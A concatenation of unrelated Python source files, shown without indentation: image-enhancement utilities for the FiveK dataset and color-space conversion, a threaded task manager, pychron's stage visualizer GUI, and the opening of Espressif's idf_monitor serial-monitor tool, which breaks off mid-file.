return (1 - l) * a + l * b
def read_tiff16(fn):
import tifffile
import numpy as np
img = tifffile.imread(fn)
if img.dtype == np.uint8:
depth = 8
elif img.dtype == np.uint16:
depth = 16
else:
print("Warning: unsupported data type {}. Assuming 16-bit.", img.dtype)
depth = 16
return (img * (1.0 / (2**depth - 1))).astype(np.float32)
def load_config(config_name):
scope = {}
exec ('from config_%s import cfg' % config_name, scope)
return scope['cfg']
# ======================================================================================================================
# added by Hao He
# ======================================================================================================================
def get_artist_batch(folder, size=128, num=64):
import os
js = os.listdir(folder)
np.random.shuffle(js)
imgs = np.zeros((num, size, size, 3))
for i, jpg in enumerate(js[:num]):
img = cv2.imread(folder + '/' + jpg)
img = get_image_center(img) / 255.
imgs[i] = cv2.resize(img, dsize=(size, size))
return imgs
def show_artist_subnails(folder, size=128, num_row=8, num_column=8):
imgs = get_artist_batch(folder, size, num_row * num_column)
return make_image_grid(imgs, per_row=num_row)
def np_tanh_range(l, r):
def get_activation(left, right):
def activation(x):
return np.tanh(x) * (right - left) + left
return activation
return get_activation(l, r)
class WB2:
def filter_param_regressor(self, features):
log_wb_range = np.log(5)
color_scaling = np.exp(
np_tanh_range(-log_wb_range, log_wb_range)(features[:, :3]))
# There will be no division by zero here unless the WB range lower bound is 0
return color_scaling
def process(self, img, param):
lum = (img[:, :, :, 0] * 0.27 + img[:, :, :, 1] * 0.67 +
img[:, :, :, 2] * 0.06 + 1e-5)[:, :, :, None]
tmp = img * param[:, None, None, :]
tmp = tmp / (tmp[:, :, :, 0] * 0.27 + tmp[:, :, :, 1] * 0.67 +
tmp[:, :, :, 2] * 0.06 + 1e-5)[:, :, :, None] * lum
return tmp
def degrade_images_in_folder(
folder,
dst_folder_suffix,
LIGHTDOWN=True,
UNBALANCECOLOR=True,):
import os
js = os.listdir(folder)
dst_folder = folder + '-' + dst_folder_suffix
try:
os.mkdir(dst_folder)
except:
print('dir exist!')
print('in ' + dst_folder)
num = 3
for j in js:
img = cv2.imread(folder + '/' + j) / 255.
if LIGHTDOWN:
for _ in range(num - 1):
out = pow(img, np.random.uniform(0.4, 0.6)) * np.random.uniform(
0.25, 0.5)
cv2.imwrite(dst_folder + '/' + ('L%d-' % _) + j, out * 255.)
out = img * img
out = out * (1.0 / out.max())
cv2.imwrite(dst_folder + '/' + ('L%d-' % num) + j, out * 255.)
if UNBALANCECOLOR:
filter = WB2()
outs = np.array([img] * num)
features = np.abs(np.random.rand(num, 3))
for _, out in enumerate(
filter.process(outs, filter.filter_param_regressor(features))):
# print out.max()
out /= out.max()
out *= np.random.uniform(0.7, 1)
cv2.imwrite(dst_folder + '/' + ('C%d-' % _) + j, out * 255.)
def vis_images_and_indexs(images, features, dir, name):
# indexs = np.reshape(indexs, (len(indexs),))
# print('visualizing images and indexs: ', images.shape, indexs.shape)
id_imgs = []
for feature in features:
img = np.ones((64, 64, 3))
cv2.putText(img,
str(feature), (4, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.25,
(1.0, 0.0, 0.0))
id_imgs.append(img)
id_imgs = np.stack(id_imgs, axis=0)
# print('id imgs: ', id_imgs.shape)
vis_imgs = np.vstack([images, id_imgs])
image = make_image_grid(vis_imgs, per_row=images.shape[0])
vis_dir = dir
try:
os.mkdir(vis_dir)
except:
pass
cv2.imwrite(os.path.join(vis_dir, name + '.png'), image[:, :, ::-1] * 255.0)
def read_set(name):
if name == 'u_test':
fn = 'data/folds/FiveK_test.txt'
need_reverse = False
elif name == 'u_amt':
fn = 'data/folds/FiveK_test_AMT.txt'
need_reverse = False
elif name == '5k': # add by hao
return list(range(1, 5001))
elif name == '2k_train':
fn = 'data/folds/FiveK_train_first2k.txt'
need_reverse = False
elif name == '2k_target':
fn = 'data/folds/FiveK_train_second2k.txt'
need_reverse = False
else:
assert False, name + ' not found'
l = []
ln = 0
with open(fn, 'r') as f:
for i in f:
if i[0] != '#':
try:
i = int(i)
ln += 1
l.append(i)
except Exception as e:
print(e)
pass
if need_reverse:
l = list(set(range(1, 5001)) - set(l))
return l
'''
util_image.py
Copyright (c) 2014 Zhicheng Yan (zhicheng.yan@live.com)
modified 2017 by Yuanming Hu (yuanmhu@gmail.com)
note that some of the color space conversions are NOT exact, like gamma 1.8 or 2.2
'''
import numpy as np
from skimage import color
import tifffile as tiff
class UtilImageError(Exception):
pass
''' undo gamma correction '''
def linearize_ProPhotoRGB(pp_rgb, reverse=False):
if not reverse:
gamma = 1.8
else:
gamma = 1.0 / 1.8
pp_rgb = np.power(pp_rgb, gamma)
return pp_rgb
def XYZ_chromatic_adapt(xyz, src_white='D65', dest_white='D50'):
if src_white == 'D65' and dest_white == 'D50':
M = [[1.0478112, 0.0228866, -0.0501270], \
[0.0295424, 0.9904844, -0.0170491], \
[-0.0092345, 0.0150436, 0.7521316]]
elif src_white == 'D50' and dest_white == 'D65':
M = [[0.9555766, -0.0230393, 0.0631636], \
[-0.0282895, 1.0099416, 0.0210077], \
[0.0122982, -0.0204830, 1.3299098]]
else:
raise UtilCnnImageEnhanceError('invalid pair of source and destination white reference %s,%s') \
% (src_white, dest_white)
M = np.array(M)
sp = xyz.shape
assert sp[2] == 3
xyz = np.transpose(np.dot(M, np.transpose(xyz.reshape((sp[0] * sp[1], 3)))))
return xyz.reshape((sp[0], sp[1], 3))
# pp_rgb float in range [0,1], linear ProPhotoRGB
# refernce white is D50
def ProPhotoRGB2XYZ(pp_rgb, reverse=False):
if not reverse:
M = [[0.7976749, 0.1351917, 0.0313534], \
[0.2880402, 0.7118741, 0.0000857], \
[0.0000000, 0.0000000, 0.8252100]]
else:
M = [[1.34594337, -0.25560752, -0.05111183], \
[-0.54459882, 1.5081673, 0.02053511], \
[0, 0, 1.21181275]]
M = np.array(M)
sp = pp_rgb.shape
xyz = np.transpose(
np.dot(M, np.transpose(pp_rgb.reshape((sp[0] * sp[1], sp[2])))))
return xyz.reshape((sp[0], sp[1], 3))
''' normalize L channel so that minimum of L is 0 and maximum of L is 100 '''
def normalize_Lab_image(lab_image):
h, w, ch = lab_image.shape[0], lab_image.shape[1], lab_image.shape[2]
assert ch == 3
lab_image = lab_image.reshape((h * w, ch))
L_ch = lab_image[:, 0]
L_min, L_max = np.min(L_ch), np.max(L_ch)
# print 'before normalization L min %f,Lmax %f' % (L_min,L_max)
scale = 100.0 / (L_max - L_min)
lab_image[:, 0] = (lab_image[:, 0] - L_min) * scale
# print 'after normalization L min %f,Lmax %f' %\
(np.min(lab_image[:, 0]), np.max(lab_image[:, 0]))
return lab_image.reshape((h, w, ch))
''' white reference 'D65' '''
def read_tiff_16bit_img_into_XYZ(tiff_fn, exposure=0):
pp_rgb = tiff.imread(tiff_fn)
pp_rgb = np.float64(pp_rgb) / (2**16 - 1.0)
if not pp_rgb.shape[2] == 3:
print('pp_rgb shape', pp_rgb.shape)
raise UtilImageError('image channel number is not 3')
pp_rgb = linearize_ProPhotoRGB(pp_rgb)
pp_rgb *= np.power(2, exposure)
xyz = ProPhotoRGB2XYZ(pp_rgb)
xyz = XYZ_chromatic_adapt(xyz, src_white='D50', dest_white='D65')
return xyz
def ProPhotoRGB2Lab(img):
if not img.shape[2] == 3:
print('pp_rgb shape', img.shape)
raise UtilImageError('image channel number is not 3')
img = linearize_ProPhotoRGB(img)
xyz = ProPhotoRGB2XYZ(img)
lab = color.xyz2lab(xyz)
return lab
def linearProPhotoRGB2Lab(img):
if not img.shape[2] == 3:
print('pp_rgb shape', img.shape)
raise UtilImageError('image channel number is not 3')
xyz = ProPhotoRGB2XYZ(img)
lab = color.xyz2lab(xyz)
return lab
import threading
import time
class AsyncTaskManager:
def __init__(self, target, args=(), kwargs={}):
self.target = target
self.args = args
self.kwargs = kwargs
self.condition = threading.Condition()
self.result = None
self.thread = threading.Thread(target=self.worker)
self.stopped = False
self.thread.daemon = True
self.thread.start()
def worker(self):
while True:
self.condition.acquire()
while self.result is not None:
if self.stopped:
self.condition.release()
return
self.condition.notify()
self.condition.wait()
self.condition.notify()
self.condition.release()
result = (self.target(*self.args, **self.kwargs),)
self.condition.acquire()
self.result = result
self.condition.notify()
self.condition.release()
def get_next(self):
self.condition.acquire()
while self.result is None:
self.condition.notify()
self.condition.wait()
result = self.result[0]
self.result = None
self.condition.notify()
self.condition.release()
return result
def stop(self):
while self.thread.is_alive():
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
def test_async_task_manager():
def task():
print('begin sleeping...')
time.sleep(1)
print('end sleeping.')
task.i += 1
print('returns', task.i)
return task.i
task.i = 0
async = AsyncTaskManager(task)
t = time.time()
for i in range(5):
ret = async.get_next()
# ret = task()
print('got', ret)
time.sleep(1)
async.stop()
print(time.time() - t)
|
stage_visualizer.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from chaco.pdf_graphics_context import PdfPlotGraphicsContext
from enable.component_editor import ComponentEditor
from traits.api import Instance, List, Property, Str
from traitsui.api import View, HGroup, UItem, TabularEditor, Handler, Action
from traitsui.tabular_adapter import TabularAdapter
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.core.helpers.filetools import unique_date_path
from pychron.core.helpers.formatting import floatfmt
from pychron.loggable import Loggable
from pychron.canvas.canvas2D.stage_visualization_canvas import StageVisualizationCanvas
from pychron.pychron_constants import LIGHT_RED
from pychron.stage.maps.laser_stage_map import LaserStageMap
from pychron.paths import paths
class ResultsAdapter(TabularAdapter):
columns = [("Hole", "hole_id"), ("dX", "dx"), ("dY", "dy")]
dx_text = Property
dy_text = Property
def get_bg_color(self, obj, trait, row, column=0):
item = getattr(obj, trait)[row]
if not item.corrected:
return LIGHT_RED
def _get_dx_text(self):
return floatfmt(self.item.dx, n=3)
def _get_dy_text(self):
return floatfmt(self.item.dy, n=3)
class StageVisualizerHandler(Handler):
def save(self, info):
info.object.save()
class StageVisualizer(Loggable):
canvas = Instance(StageVisualizationCanvas, ())
results = List
stage_map_name = Str
def set_stage_map(self, smap, points, calibration):
self.stage_map_name = smap.name
self.canvas.build_map(smap, points, calibration)
def save(self):
root = paths.corrections_dir
base = self.stage_map_name
p = unique_date_path(root, base, extension="")
gp = "{}.{}".format(p, "pdf")
gc = PdfPlotGraphicsContext(filename=gp, pagesize="letter")
from reportlab.lib.pagesizes import letter
bounds = self.canvas.bounds
self.canvas.do_layout(size=letter, force=True)
gc.render_component(self.canvas, valign="center")
gc.save(p)
self.canvas.do_layout(size=bounds, force=True)
self.canvas.invalidate_and_redraw()
tp = "{}.{}".format(p, "txt")
with open(tp, "w") as wfile:
for r in self.results:
args = r.nx, r.ny, r.dx, r.dy
args = ["{:0.5f}".format(x) for x in args]
args = [r.hole_id, str(r.corrected)] + args
line = ",".join(args)
wfile.write("{}\n".format(line))
def traits_view(self):
v = View(
HGroup(
UItem("canvas", editor=ComponentEditor(width=550, height=550)),
UItem("results", editor=TabularEditor(adapter=ResultsAdapter())),
),
handler=StageVisualizerHandler(),
buttons=[
Action(action="save", name="Save"),
],
title="Stage Visualizer",
resizable=True,
)
return v
if __name__ == "__main__":
from pychron.core.helpers.logger_setup import logging_setup
paths.build("_dev")
logging_setup("sv", use_archiver=False, use_file=False)
p = (
"/Users/ross/Programming/github/support_pychron/setupfiles/tray_maps"
"/221-hole.txt"
)
# p = '/Users/argonlab3/Pychron_co2/setupfiles/tray_maps/221-small_hole.txt'
sm = LaserStageMap(file_path=p)
sv = StageVisualizer()
results = [
((-3.9878, 15.9512), True),
((-1.9939, 15.5), False),
((0, 15.9512), True),
]
class CO:
rotation = 1
center = -2, 0
sv.set_stage_map(sm, results, CO())
sv.configure_traits()
# ============= EOF =============================================
# class StageVisualizer(Manager):
# canvas = Instance(StageVisualizationCanvas)
# stage_map = Instance(LaserStageMap)
# status_text = Str
#
# use_calibration = Bool(True)
# flag = True
# center = Tuple(Float, Float)
# rotation = Float(23)
# path = None
#
# def __init__(self, *args, **kw):
# super(StageVisualizer, self).__init__(*args, **kw)
# # p = os.path.join(data_dir, 'stage_visualizer')
# self.path, _ = unique_path(paths.stage_visualizer_dir, 'vis',
# extension='')
#
# def update_calibration(self, obj, name, new):
# self.clear()
# if name == 'calibration_item':
# self.center = new.center
# self.rotation = new.rotation
# else:
# setattr(self, name, new)
#
# self.canvas.build_map(self.stage_map, calibration=[self.center,
# self.rotation])
#
# def set_calibration(self, ca):
# pass
#
# # self.clear()
# # self.center = ca.get_center_position()
# # self.rotation = ca.get_rotation()
# #
# # self.canvas.build_map(self.stage_map, calibration=[self.center,
# # self.rotation])
#
# def clear(self):
# self.info('clearing visualizer')
# # sm = self.stage_map
# #
# # sm.clear_correction_file()
# # sm.clear_interpolations()
#
# self.canvas.clear()
#
# def dump(self):
# with open(self.path, 'wb') as f:
# d = dict(center=self.center,
# rotation=self.rotation,
# markup=self.canvas.markupcontainer)
#
# pickle.dump(d, f)
#
# def load_visualization(self):
# p = self.open_file_dialog()
#
# if p is not None:
# with open(p, 'rb') as f:
# # try:
# d = pickle.load(f)
#
# self.center = d['center']
# self.rotation = d['rotation']
#
# for k, v in d['markup'].iteritems():
# v.set_canvas(self.canvas)
#
# self.canvas.markupcontainer = d['markup']
# # except Exception, e:
# # print 'exception', e
#
# # self.canvas.invalidate_and_redraw()
#
# def set_current_hole(self, h):
# self.canvas.set_current_hole(h)
# self.canvas.request_redraw()
#
# def record_uncorrected(self, h, dump=True, *args):
# self.canvas.record_uncorrected(h)
# if dump:
# self.dump()
#
# def record_correction(self, h, x, y, dump=True):
# self.canvas.record_correction(h, x, y)
# if dump:
# self.dump()
#
# def record_interpolation(self, hole, x, y, color=(1, 1, 0), dump=True):
# if isinstance(hole, (str, int)):
# hole = self.stage_map.get_hole(str(hole))
#
# self.canvas.record_interpolation(hole, x, y, color)
# if dump:
# self.dump()
#
# @on_trait_change('canvas:selected')
# def update_status_bar(self, parent, name, obj):
# if isinstance(obj, SampleHole):
# correction = ''
# if obj.hole.corrected:
# correction = 'cor.= ({:0.2f},{:0.2f})'.format(obj.hole.x_cor,
# obj.hole.y_cor
# )
# # interpolation = ''
# # if obj.hole.interpolated:
# # h = ', '.join(sorted(set([iph.id for iph in obj.hole.interpolation_holes])))
# # interpolation = 'interpolation holes= {}'.format(h)
#
# self.status_text = 'hole = {} nom.= ({:0.2f},{:0.2f}) cal.=({:0.2f},{:0.2f}) {}'.format(obj.name,
# obj.hole.x,
# obj.hole.y,
# obj.x,
# obj.y,
# correction)
#
# def _use_calibration_changed(self):
# ca = self.canvas
# ca.build_map(self.stage_map,
# calibration=[self.center,
# self.rotation] if self.use_calibration else None
# )
#
# def traits_view(self):
# v = View(
# # Item('test'),
# # HGroup(Item('center', style='readonly'), Item('rotation', style='readonly')),
# Item('canvas', editor=ComponentEditor(width=550,
# height=550),
# show_label=False),
#
# statusbar='status_text',
# title='Stage Visualizer',
# resizable=True
# )
# return v
#
# def _stage_map_default(self):
# p = os.path.join(paths.map_dir, '61-hole.txt')
# sm = LaserStageMap(file_path=p)
# sm.load_correction_file()
# return sm
#
# def _canvas_default(self):
# c = StageVisualizationCanvas()
# c.build_map(self.stage_map, calibration=(self.center,
# self.rotation))
#
# return c
#
# # ===============================================================================
# # testing
# # ===============================================================================
# def test_view(self):
# v = View(Item('test'),
# Item('use_calibration'),
# Item('center'),
# Item('rotation'),
# Item('canvas', editor=ComponentEditor(width=700,
# height=700),
# show_label=False),
#
# statusbar='status_text'
# )
# return v
#
# def _test_fired(self):
# t = Thread(target=self._execute_)
# t.start()
#
# def _apply_calibration(self, hole):
# cpos = (0, 0)
# rot = 0
# if self.use_calibration:
# cpos = self.center
# rot = self.rotation
#
# return self.stage_map.map_to_calibration(hole.nominal_position,
# cpos, rot)
#
# def _execute_(self):
#
# ca = self.canvas
#
# self.clear()
# sm = self.stage_map
# sm.clear_correction_file()
# sm.clear_interpolations()
#
# ca.build_map(sm, calibration=[self.center,
# self.rotation] if self.use_calibration else None
# )
# ca.invalidate_and_redraw()
#
# # set some correction values
# vs = range(61)
# # vs.remove(17)
# # vs.remove(26)
# # vs.remove(25)
# # vs.remove(34)
# # vs.remove(35)
# # vs.remove(0)
# # vs.remove(1)
# # vs.remove(2)
# #
# # vs.remove(58)
# # vs.remove(59)
# # vs.remove(60)
# # vs.remove(3)
# # vs.remove(6)
# vs.remove(30)
# # vs = range(50, 60)
# for i in vs:
# # for i in [21, 29, 30]:
#
# h = sm.get_hole(str(i + 1))
# x, y = self._apply_calibration(h)
#
# x = self._add_error(x)
# y = self._add_error(y)
#
# # ca.record_correction(h, x, y)
# # sm.set_hole_correction(h.id, x, y)
# r = random.randint(0, 10)
# # r = 7
# if r > 6:
# self.record_correction(h, x, y, dump=False)
# sm.set_hole_correction(h.id, x, y)
#
# # self._test_interpolate_one()
# self._test_interpolate_all()
#
# def _add_error(self, a):
# # return a
# return a + (0.5 - random.random()) / 2.
#
# def _test_interpolate_one(self):
# sm = self.stage_map
# ca = self.canvas
# h = sm.get_hole('7')
# args = sm.get_interpolated_position('7')
# # print args
# color = (1, 1, 0)
# if args:
# nx = args[0]
# ny = args[1]
# self.record_interpolation(h, nx, ny, color, dump=False)
# ca.invalidate_and_redraw()
#
# def _test_interpolate_all(self):
# sm = self.stage_map
# ca = self.canvas
# colors = [(1, 1, 0), (0, 1, 1), (0, 0.75, 1), (0, 0.5, 1),
# (0, 0.75, 0.75), (0, 0.5, 0.75)
# ]
# for j, color in enumerate(colors[:1]):
# self.info('iteration {}'.format(j + 1))
# s = 0
# for i in range(60, -1, -1):
# h = sm.get_hole(str(i + 1))
# self.set_current_hole(h)
# r = random.randint(0, 10)
# r = 0
# if r > 5:
# nx, ny = self._apply_calibration(h)
# nx = self._add_error(nx)
# ny = self._add_error(ny)
# self.record_correction(h, nx, ny, dump=False)
# sm.set_hole_correction(h.id, nx, ny)
# else:
# kw = dict(cpos=self.center,
# rotation=self.rotation)
# if not self.use_calibration:
# kw['cpos'] = (0, 0)
# kw['rotation'] = 0
#
# args = sm.get_interpolated_position(h.id,
# **kw
# )
# if args:
# s += 1
# nx = args[0]
# ny = args[1]
# self.record_interpolation(h, nx, ny, color, dump=False)
# else:
# if not h.has_correction():
# self.record_uncorrected(h)
# # time.sleep(0.5)
# # do_later(ca.invalidate_and_redraw)
#
# n = 61 - sum([1 for si in sm.sample_holes if si.has_correction()])
# self.info('interpolated holes {} - noncorrected {}'.format(s, n))
#
# if not n or not s:
# break
#
# ca.invalidate_and_redraw()
#
# self.dump()
# self.info('noncorrected holes = {}'.format(n))
#
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import datetime
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
file_handler=None
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.0"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if hasattr(self.console, "cancel"):
self.console.cancel()
elif os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.1 or newer,
# older pyserial doesn't have this method, hence this hack.
#
# on Windows there is a different (also hacky) fix, applied above.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
current_time=datetime.datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
data=data.replace("\n","\n"+current_time+' ')
file_handler.write(data)
file_handler.flush()
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._read_line = b""
self._gdb_buffer = b""
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
def handle_serial_input(self, data):
# this may need to be made more efficient, as it pushes out a byte
# at a time to the console
for b in data:
self.console.write_bytes(b)
if b == b'\n': # end of line
self.handle_serial_input_line(self._read_line.strip())
self._read_line = b""
else:
self._read_line += b
self.check_gdbstub_trigger(b)
def handle_serial_input_line(self, line):
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash to build & flash app
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
)
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
yellow_print("Running make %s..." % target)
p = subprocess.Popen([self.make,
target ])
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfia", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
def check_gdbstub_trigger(self, c):
self._gdb_buffer = self._gdb_buffer[-6:] + c # keep the last 7 characters seen
m = re.match(b"\\$(T..)#(..)", self._gdb_buffer) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
subprocess.call(["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file], cwd=".")
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
self.prompt_next_action("gdb exited")
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
